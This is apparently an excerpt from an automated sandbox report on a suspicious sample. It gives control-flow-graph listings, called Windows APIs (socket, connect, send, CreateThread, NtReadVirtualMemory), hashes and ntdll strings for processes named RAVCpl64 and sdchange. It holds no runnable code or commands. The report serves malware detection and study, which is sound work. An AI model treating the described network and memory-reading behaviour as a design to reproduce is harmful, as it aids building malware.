                                                                                  control_flow_graph 36 69c651-69c652 37 69c63c-69c650 36->37 38 69c654-69c6a9 call 6991b8 36->38 41 69c6ab-69c6cf call 69f908 38->41 42 69c6d5-69c6f8 connect 38->42 41->42
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: connect
                                                                                  • String ID:
                                                                                  • API String ID: 1959786783-0
                                                                                  • Opcode ID: 979d2a59bab14fd77f20a66414e983560844dd6cdcf92ae96fd775dd2dced440
                                                                                  • Instruction ID: f5e84925436e07a39b32b3492ff63cbc74a8c95f56c323c993c976611b8c18d5
                                                                                  • Opcode Fuzzy Hash: 979d2a59bab14fd77f20a66414e983560844dd6cdcf92ae96fd775dd2dced440
                                                                                  • Instruction Fuzzy Hash: CB21423090CB088FDF94EF1CA48975977E1FB58310F04056EE85DC735ADA7099458B96

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 45 694628-694667 call 68f308 call 69f908 50 694669 45->50 51 6946de-6946ed 45->51 52 69466b-694680 SleepEx 50->52 53 6946cb-6946d2 52->53 54 694682-694689 52->54 53->52 55 6946d4-6946dc call 6945a8 53->55 54->52 56 69468b-69469c 54->56 55->52 56->52 58 69469e-6946a4 56->58 58->52 60 6946a6-6946a9 58->60 60->52 61 6946ab-6946bc call 69abb8 call 693138 60->61 65 6946c1-6946c9 call 693288 61->65 65->52
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 42cbed4d3c393c331c99c5a85ceac0bd99ce30290078a8cfa166a71a7ccd86db
                                                                                  • Instruction ID: 2628318f882a3a79a117185cd1122f254095c8d1482328750796fbf477787cab
                                                                                  • Opcode Fuzzy Hash: 42cbed4d3c393c331c99c5a85ceac0bd99ce30290078a8cfa166a71a7ccd86db
                                                                                  • Instruction Fuzzy Hash: 22119630614F288FCF95EF288584B6972D6FBC9B00F450A7EE84EC7646CF2489428B46

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 68 69c45e-69c4b8 call 698ff8 71 69c4ba-69c4de call 69f908 68->71 72 69c4e4-69c505 socket 68->72 71->72
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: socket
                                                                                  • String ID:
                                                                                  • API String ID: 98920635-0
                                                                                  • Opcode ID: 6e97e8a9e8d62f078809f3c57f75db5fb70759054e2df11a087fa9a8b6d13824
                                                                                  • Instruction ID: 21ddaaf7372419018706a118d49eb455354a9872404595dd2a0dac5f004b715d
                                                                                  • Opcode Fuzzy Hash: 6e97e8a9e8d62f078809f3c57f75db5fb70759054e2df11a087fa9a8b6d13824
                                                                                  • Instruction Fuzzy Hash: C1114F3091CB488FCB98EF289085756B7E5FB99300F4445BEE88DCB24ADE708944C796

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 75 69c59e-69c5f9 call 699128 79 69c5fb-69c61f call 69f908 75->79 80 69c625-69c636 send 75->80 79->80 82 69c63c-69c650 80->82
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: send
                                                                                  • String ID:
                                                                                  • API String ID: 2809346765-0
                                                                                  • Opcode ID: e4866cdc84c44f62c7a22c2111c9506db465c81c97f00dd7cbe3987f6cce5b86
                                                                                  • Instruction ID: f78bcfcac7f036859a50d8f155db5d9561555540f9bd645a07bda08154bd5233
                                                                                  • Opcode Fuzzy Hash: e4866cdc84c44f62c7a22c2111c9506db465c81c97f00dd7cbe3987f6cce5b86
                                                                                  • Instruction Fuzzy Hash: DB11A23050CA488FCB58EF28D489769BBE1FB98310F0446BEE84EC729ADB709440C796

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 84 6939cf-693a03 86 693a05-693a10 call 6a0168 84->86 87 693a26-693a53 call 68f308 call 69f908 84->87 86->87 93 693a12-693a1c 86->93 95 693a88-693a92 87->95 96 693a55-693a87 call 6a426b CreateThread 87->96 93->87
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 2422867632-0
                                                                                  • Opcode ID: ab6ad6d045aaee73ac8763e60883343574758c535f2f3686d9461b287767a74d
                                                                                  • Instruction ID: 559938230fb88fe12196b909dac532e3f2b0dd0c7a6245f9674c4f23d25883fb
                                                                                  • Opcode Fuzzy Hash: ab6ad6d045aaee73ac8763e60883343574758c535f2f3686d9461b287767a74d
                                                                                  • Instruction Fuzzy Hash: 9A11A130218B044FEB84EF68C889796B3E5FB98315F08067DE449CB252DF799A46CB41

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 99 69daf4-69db22 call 6a0898 102 69db2f-69db3b call 6a3da8 99->102 103 69db24-69db2e 99->103 106 69db49-69db5e call 6a0088 102->106 107 69db3d-69db44 call 6a4078 102->107 111 69db7c-69db84 106->111 112 69db60-69db75 LdrLoadDll 106->112 107->106 112->111
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: d2264aae8a7a59272e80b1de33a92ce51c23d545bcadcd8bada3e69428afb324
                                                                                  • Instruction ID: b10e0caac1635ac0fe9601aa23f17fcb1b17147fe0c69511f5aa202fd2d67ad3
                                                                                  • Opcode Fuzzy Hash: d2264aae8a7a59272e80b1de33a92ce51c23d545bcadcd8bada3e69428afb324
                                                                                  • Instruction Fuzzy Hash: BA01D831208A084BDB54F735C8896ABB3D5FFD8304F04053DA88DC2150EA35DA448B46

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 113 69c708-69c74d call 699248 116 69c779-69c78c closesocket 113->116 117 69c74f-69c773 call 69f908 113->117 117->116
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.37226841150.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_680000_RAVCpl64.jbxd
                                                                                  Similarity
                                                                                  • API ID: closesocket
                                                                                  • String ID:
                                                                                  • API String ID: 2781271927-0
                                                                                  • Opcode ID: c7a860e3fefc1fc3420eac276afe827bf7f73839419f65208696baed3f9dd96a
                                                                                  • Instruction ID: b3355a76cac5f94aeb530c797215def560d9701a6a6aaa214c26cb4ddff9b30e
                                                                                  • Opcode Fuzzy Hash: c7a860e3fefc1fc3420eac276afe827bf7f73839419f65208696baed3f9dd96a
                                                                                  • Instruction Fuzzy Hash: 51011E3051CB489FDB85EF28C0897AAB7F2FBA8301F44067EB88DC7256DB3485448B56

                                                                                  Execution Graph

                                                                                  Execution Coverage:0.5%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:11
                                                                                  Total number of Limit Nodes:1
                                                                                  execution_graph 82692 43c29f0 LdrInitializeThunk 82694 474effa 82695 474f02d 82694->82695 82696 474f1a9 NtQueryInformationProcess 82695->82696 82699 474f21c 82695->82699 82697 474f1e3 82696->82697 82698 474f2c1 NtReadVirtualMemory 82697->82698 82697->82699 82698->82699 82700 43c2b20 82702 43c2b2a 82700->82702 82703 43c2b3f LdrInitializeThunk 82702->82703 82704 43c2b31 82702->82704

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 0 474effa-474f02b 1 474f02d-474f044 call 4751338 0->1 2 474f049-474f068 call 4751358 call 474d058 0->2 1->2 8 474f06e-474f17a call 474ef38 call 4751358 call 47552c4 call 47403a8 call 4750908 call 47403a8 call 4750908 call 4753028 2->8 9 474f65f-474f66a 2->9 26 474f180-474f21a call 47403a8 call 4750908 NtQueryInformationProcess call 4751358 call 47403a8 call 4750908 8->26 27 474f653-474f65a call 474ef38 8->27 39 474f21c-474f229 26->39 40 474f22e-474f2aa call 47552d2 call 47403a8 call 4750908 26->40 27->9 39->27 40->39 49 474f2b0-474f2bf call 47552fc 40->49 52 474f2c1-474f302 NtReadVirtualMemory call 4752048 49->52 53 474f30c-474f352 call 47403a8 call 4750908 call 4753988 49->53 56 474f307 52->56 62 474f354-474f36c 53->62 63 474f371-474f46d call 47403a8 call 4750908 call 475530a call 47403a8 call 4750908 call 4753348 call 4751308 * 3 call 47552fc 53->63 56->27 62->27 86 474f4a0-474f4b8 call 47552fc 63->86 87 474f46f-474f49e call 47552fc call 4751308 call 475535e call 4755318 63->87 92 474f4e1-474f4f6 call 4751f88 86->92 93 474f4ba-474f4dc call 4752af8 86->93 98 474f4fb-474f505 87->98 92->98 93->92 100 474f5ca-474f633 call 47403a8 call 4750908 call 4753ca8 98->100 101 474f50b-474f55b call 47403a8 call 4750908 call 4753668 call 47552fc 98->101 100->27 126 474f635-474f64e call 4751338 100->126 120 474f590-474f598 call 47552fc 101->120 121 474f55d-474f586 call 47553a8 call 475535e 101->121 120->100 130 474f59a-474f5a5 120->130 121->120 126->27 130->100 132 474f5a7-474f5c5 call 4753fc8 130->132 132->100
                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL ref: 0474F1C8
                                                                                  • NtReadVirtualMemory.NTDLL ref: 0474F2DC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36985469985.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4740000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationMemoryProcessQueryReadVirtual
                                                                                  • String ID: 0$Is5(
                                                                                  • API String ID: 1498878907-2799076408
                                                                                  • Opcode ID: b3a70b2416c6de30a22e50daacecbf8430bfc88417f87ee0b7ee7466bab16f26
                                                                                  • Instruction ID: 6215eed2352fb35a5c0cdec1d86f447777344ed59db9f7948a0f9353e85179e4
                                                                                  • Opcode Fuzzy Hash: b3a70b2416c6de30a22e50daacecbf8430bfc88417f87ee0b7ee7466bab16f26
                                                                                  • Instruction Fuzzy Hash: 49025D74518B8C8FDBA5EF28D898AEE77E0FB98304F40461ED84ADB254DF74A641CB41

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 147 43c2c30-43c2c3c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 148 43c2cf0-43c2cfc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 149 43c2d10-43c2d1c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 150 43c2e50-43c2e5c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 138 43c29f0-43c29fc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 139 43c2a10-43c2a1c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 140 43c2a80-43c2a8c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 141 43c2ac0-43c2acc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 143 43c2b10-43c2b1c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 142 43c2b00-43c2b0c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 145 43c2b90-43c2b9c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 144 43c2b80-43c2b8c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_4350000_sdchange.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 146 43c2bc0-43c2bcc LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 134 43c2b2a-43c2b2f 135 43c2b3f-43c2b46 LdrInitializeThunk 134->135 136 43c2b31-43c2b38 134->136
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36983201764.00000000021B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 043F4460
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 043F4507
                                                                                  • Execute=1, xrefs: 043F451E
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 043F454D
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 043F4592
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 043F4530
                                                                                  • ExecuteOptions, xrefs: 043F44AB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.36984689878.0000000004350000.00000040.00001000.00020000.00000000.sdmp, Offset: 04350000, based on PE: true
                                                                                  • Associated: 00000004.00000002.36984689878.0000000004479000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000004.00000002.36984689878.000000000447D000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@$@w1wX
                                                                                  • API String ID: 0-3909879739